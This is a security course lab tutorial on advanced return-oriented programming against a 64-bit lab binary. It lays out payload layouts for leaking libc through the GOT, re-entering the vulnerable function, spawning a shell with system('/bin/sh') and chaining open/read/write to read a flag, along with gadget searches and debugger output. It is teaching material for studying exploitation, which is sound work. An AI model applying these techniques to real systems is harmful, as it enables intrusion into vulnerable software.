Tut06: Advanced ROP

In the last tutorial, we used code and stack pointers freely leaked by the binary in our control-hijacking attacks. In this tutorial, we'll exploit the same program again, but this time without any a-priori information leaks, and also in x86_64 (64-bit).

Step 0. Understanding the binary

$ checksec ./target
[*] '/home/lab06/tut06-advrop/target'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

As before, DEP (NX) is enabled, so pages not explicitly marked as executable will not be executable. PIE is also not enabled, which means that the target executable's base address will not be randomized by ASLR (but note that libraries, the heap, and stack addresses will still be randomized). There's also no canary, meaning we can smash the stack and immediately start hijacking control flow.

[Task] Your first task is to trigger a buffer overflow and control rip.

You can control rip with the following payload:

[ buf ]
[ ... ]
[ ra  ] -> func
[dummy]
[ ... ] -> arg?

Step 1. Controlling arguments in x86_64

In 32-bit x86, we could control the invoked function's arguments by writing them to the stack. This no longer works in x86_64, as parameters are now conventionally passed using registers. For example, the first argument to a function will be read from rdi, instead of from somewhere on the stack.

In the last tutorial, we only used the pop; ret gadget to clean up the stack, but it can also be used to control registers. For example, by executing pop rdi; ret, you can set the rdi register to a controlled value from the stack.

Let's control the argument to puts() with the following payload:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ]
[ ra  ] -> puts()
[ ra  ]

Since our binary is not PIE-enabled, we can search for gadgets in its code.

Looking for pop

First, let's look for the pop gadget:

$ ropper --file ./target --search "pop rdi; ret"
...
[INFO] File: ./target
0x00000000004008d3: pop rdi; ret;

Looking for puts()

Next we need the address of puts(). puts() lives in libc, and since libc has a randomized base address due to ASLR, we can't predict its address. How can we solve this?

While it's true that we can't call the actual implementation of puts() in libc directly, we can invoke it indirectly, through the resolved address stored in the program's GOT.

Do you remember how the program invoked external functions through the PLT/GOT, like this?

0x0000000000400600 <puts@plt>:
+--0x400600: jmp    QWORD PTR [rip+0x200a12]  # GOT of puts()
|
| (first time)
+->0x400646: push   0x0                       # index of puts()
|  0x40064b: jmp    0x4005f0 <.plt>           # resolve libc's puts()
|
| (once resolved)
+--> puts() @libc

0x0000000000400767 <start>:
   ...
   400776: call   0x4006a0 <puts@plt>

The PLT and GOT are part of the target binary, so their addresses are constant. We can therefore invoke puts() by jumping into the PLT code corresponding to it.

pwndbg also provides an easy way to look up PLT routines in the binary:

pwndbg> plt
0x400600: puts@plt
0x400610: printf@plt
0x400620: memset@plt
0x400630: geteuid@plt
0x400640: read@plt
0x400650: strcmp@plt
0x400660: setreuid@plt
0x400670: setvbuf@plt

[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary-read primitive.

Your payload should look like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "Password OK :)"
[ ra  ] -> puts@plt
[ ra  ] (crashing)

Step 2. Leaking libc's code pointer

Although the process image has lots of interesting functions in its PLT/GOT that we can abuse, it's missing the truly powerful functions like system() that allow for arbitrary code execution. To invoke arbitrary libc functions, we'll first need to leak code pointers pointing to libc.

Which part of the process image contains libc pointers? The GOT! After all, the goal of puts@plt (below) is to act as a bridge between the binary and puts@libc, by reading the latter's real address from the GOT and jumping to it:

0x0000000000400600 <puts@plt>:
   0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()

What's the address of puts@GOT? It's rip + 0x200a12, so... 0x400606 + 0x200a12 = 0x601018. (We use 0x400606 because rip always points to the next instruction, and that jmp instruction is six bytes long.)

pwndbg provides a convenient way to look up entries in the binary's GOT, as well:

pwndbg> got

GOT protection: Partial RELRO | GOT functions: 10

[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7a64a30 (puts) ◂— push   r13
[0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7a48f00 (printf) ◂— sub    rsp, 0xd8
...

So the address of libc's puts() can be found in the target's GOT, specifically at 0x601018. Separately, as we found earlier, we also have the ability to call puts() through its PLT entry. Since puts() can be thought of as printing memory from whatever pointer you provide to it, we can use it to read and print puts()'s address value from the GOT -- even though that's not actually a string.

To do that, your payload should look like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt
[ ra  ] (crashing)

Note that puts() might not output all 8 bytes of the address (64-bit pointer), since the address contains multiple zeros (remember, puts() stops when it reaches a null byte).

[Task] Leak the address of libc's puts()!

Step 3. Preparing the second payload

So now what? We can calculate libc's base address from the leaked pointer to puts(), so can we now invoke any function in libc? Perhaps like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt

[ ra  ] -> pop rdi; ret
[arg1 ] -> "/bin/sh"@libc
[ ra  ] -> system()@libc
[ ra  ] (crashing)

Unfortunately, it's not quite that easy. When you're preparing the payload, you don't yet know the address of libc, since the code that will eventually leak puts@got has not yet been executed.

Of all the places we know, is there anywhere we can jump to to continue to interact with the process, so we can send additional ROP input? Yes, the start() function! Let's execute start() a second time and smash the stack once more, this time armed with knowledge of libc's base address.

[Task] Jump to start(), which has the stack overflow, a second time. Make sure that you see the program banner twice!

payload1:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt

[ ra  ] -> start

The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP again, to invoke system() with the resolved addresses.

[Task] Invoke system("/bin/sh")!

payload2:

[ buf ]
[.....]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "/bin/sh"
[ ra  ] -> system@libc

Step 4. Advanced ROP: Chaining multiple functions!

Similar to the last tutorial, we'll invoke a sequence of calls in order to read the flag from target-seccomp.

  1. open("anystring", 0); (assume that "anystring" names a symlink to /proc/flag)
  2. read(3, tmp, 1040);
  3. write(1, tmp, 1040);

Invoking open()

As we discussed earlier, we can control the first argument of a function call in x86_64 by popping a value into rdi. To control the second argument, we need an equivalent gadget for rsi.

$ ropper --file ./target --search 'pop rsi; ret'
<... nope ...>

Unfortunately, the target binary doesn't have pop rsi; ret. But there is another gadget that's effectively identical:

$ ropper --file ./target --search 'pop rsi; pop %; ret'
...
0x00000000004008d1: pop rsi; pop r15; ret;

With that, invoking open() is pretty doable:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "anystring`

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> 0
[dummy] (r15)

[ ra  ] -> open()

Invoking read()

To invoke read(), we'll need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have any suitable gadgets for that.

What should we do? Actually, at this point, since we know the address of libc, we can use additional ROP gadgets from there, too!

$ ldd target-seccomp
    linux-vdso.so.1 (0x00007ffe65f89000)
    libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd118f39000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd118b48000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fd119159000)
$ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret'
0x0000000000001b96: pop rdx; ret;
...

Your secondary payload should now look like this:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> 3

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> tmp
[dummy] (r15)

[ ra  ] -> pop rdx; ret
[arg3 ] -> 1040

[ ra  ] -> read()

[Task] Your final task is to chain open()/read()/write() and get the real flag from target-seccomp!

What if either PIE or SSP (stack canary) was enabled? Do you think we could still exploit this vulnerability?

Tips on handling stack alignment issues

When returning to libc functions in a 64-bit binary through a ROP chain, you can encounter a situation where the program segfaults on a "movaps" or "stosq" instructions in functions like buffered_vfprintf() or do_system(), as shown in the core dump below:

$ gdb-pwndbg ./target-seccomp core
Reading symbols from ./target-seccomp...
Program terminated with signal SIGSEGV, Segmentation fault.
...
 RBP  0x7ffe05c19d58 -> 0x7ffe05c19e68 <- 'BBBBBBBB\n'
 RSP  0x7ffe05c17678 -> 0x7ffe05c17759 <- 0x0
 RIP  0x7f5a4e17c75e <- 0x848948502444290f
----------------------------------------[ DISASM ]-----------------------------------------
 > 0x7f5a4e17c75e    movaps xmmword ptr [rsp + 0x50], xmm0
   0x7f5a4e17c763    mov    qword ptr [rsp + 0x108], rax
   0x7f5a4e17c76b    call   0x7f5a4e179490 <0x7f5a4e179490>

This is because some of the 64-bit libc functions require your stack to be 16-byte aligned -- that is, the address in rsp must end with a "0" when they are called. Below, you can see that this constraint has been violated, as the address in rsp ends with an "8":

*RSP  0x7fffc4cb3bb8 -> 0x400767 (start) <- push   rbp
*RIP  0x7f6636241140 (read) <- lea    rax, [rip + 0x2e0891]
----------------------------------------[ DISASM ]-----------------------------------------
   0x4008d4       <__libc_csu_init+100>    ret
    V
   0x7f6636234d69 <_getopt_internal+89>    pop    rdx
   0x7f6636234d6a <_getopt_internal+90>    pop    rcx
   0x7f6636234d6b <_getopt_internal+91>    pop    rbx
   0x7f6636234d6c <_getopt_internal+92>    ret
    V
 > 0x7f6636241140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f66365219d8>
   0x7f6636241147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f6636241149 <read+9>                 test   eax, eax
   0x7f663624114b <read+11>                jne    read+32 <read+32>

Since rsp is not 16-byte aligned, when we continue, the program ends up segfaulting on the aforementioned movaps instruction.

How can we deal with this situation? That is, how can we adjust our data on the stack to be properly aligned?

The simple solution is to add an extra ret to the beginning of your ROP chain. When ret is invoked, it increments rsp by 8 (you already know why!). Thus, you can simply add a dummy ret to make rsp 16-byte aligned.

There are many ret instructions in the binary. You can pick any of them and add it to your ROP chain. If you already have the address of a pop rdi; ret gadget, you can just add 1 to get the address of ret, since pop rdi is a one-byte instruction.

For example, the payload shown in Step 4 can be revised to:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> ret           // dummy return is added to align the stack!
[ ra  ] -> pop rdi; ret  // followed by your original rop chain
[arg1 ] -> 3

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> tmp
[dummy] (r15)

[ ra  ] -> pop rdx; ret
[arg3 ] -> 1040

[ ra  ] -> read()

Verifying in GDB that the dummy ret is added to the ROP chain (right after the end of start()):

 > 0x4007eb <start+132>              ret             <0x4008d4; __libc_csu_init+100>
    V
   0x4008d4 <__libc_csu_init+100>    ret  // THIS IS THE ADDED RET
    V
   0x4008d3 <__libc_csu_init+99>     pop    rdi
   0x4008d4 <__libc_csu_init+100>    ret

As a result, when returning into read(), rsp now ends with a "0" (16-byte aligned):

*RSP  0x7ffe49f96c60 -> 0x400767 (start) <- push   rbp
*RIP  0x7f4bc3bc5140 (read) <- lea    rax, [rip + 0x2e0891]
----------------------------------------[ DISASM ]-----------------------------------------
   0x4008d4       <__libc_csu_init+100>    ret
    V
   0x7f4bc3bb8d69 <_getopt_internal+89>    pop    rdx
   0x7f4bc3bb8d6a <_getopt_internal+90>    pop    rcx
   0x7f4bc3bb8d6b <_getopt_internal+91>    pop    rbx
   0x7f4bc3bb8d6c <_getopt_internal+92>    ret
    V
 > 0x7f4bc3bc5140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f4bc3ea59d8>
   0x7f4bc3bc5147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f4bc3bc5149 <read+9>                 test   eax, eax
   0x7f4bc3bc514b <read+11>                jne    read+32 <read+32>

Tips on ifuncs

When finding the offset of a function like memcpy() in your libc library (not needed for this tutorial, but other challenges in this lab may have you use other functions like that), you might notice that there are multiple memcpy()-like functions there. This is called an "indirect function", or "ifunc" (glibc code, gcc documentation), and it allows glibc to select the best-optimized version of the function for the hardware's capabilities detected at runtime.

$ # note: `readelf` doesn't work here because most of the ifunc symbol
$ # names aren't exported -- but we can still see them with `strings`:
$ strings /lib/x86_64-linux-gnu/libc.so.6 | grep memcpy | grep -v wmem
__memcpy_chk
__memcpy_chk
__memcpy_chk_avx512_unaligned
__memcpy_chk_avx_unaligned
__memcpy_chk_ssse3_back
__memcpy_chk_ssse3
__memcpy_chk_sse2_unaligned
__memcpy_chk_erms
memcpy
__memcpy_avx_unaligned
__memcpy_avx_unaligned_erms
__memcpy_ssse3_back
__memcpy_ssse3
__memcpy_avx512_no_vzeroupper
__memcpy_avx512_unaligned
__memcpy_sse2_unaligned
__memcpy_sse2_unaligned_erms
__memcpy_erms
__memcpy_chk_avx512_no_vzeroupper
__memcpy_chk_avx512_unaligned_erms
__memcpy_chk_avx_unaligned_erms
__memcpy_chk_sse2_unaligned_erms
__memcpy_avx512_unaligned_erms

Unfortunately, this tends to confuse GDB and pwntools, and they can report incorrect addresses for such functions. A reliable way to determine the right address is with a simple C program like this (compile with -m32 for 32-bit or -m64 for 64-bit):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef long long unsigned int llui_t;

// Before compiling, find `printf()`'s libc offset through some other
// means (readelf, gdb, pwntools, etc), and put it below:
#define PRINTF_OFFSET 0x000513a0

int main() {
  uintptr_t libc = (uintptr_t)printf - PRINTF_OFFSET;
  printf("libc:   %#llx\n", (llui_t)libc);

  if (libc & 0xfff) {
    printf("libc address looks wrong! Please double-check `PRINTF_OFFSET`.\n");
    return 1;
  }

  printf("memcpy: %#llx\n", (llui_t)((uintptr_t)memcpy - libc));
  printf("memset: %#llx\n", (llui_t)((uintptr_t)memset - libc));
  printf("strcmp: %#llx\n", (llui_t)((uintptr_t)strcmp - libc));
  return 0;
}

For a longer list of ifuncs in libc, try readelf -a [/.../libc.so.6] | grep IFUNC. Roughly speaking, most of them are "mem" and "str" functions.

Reference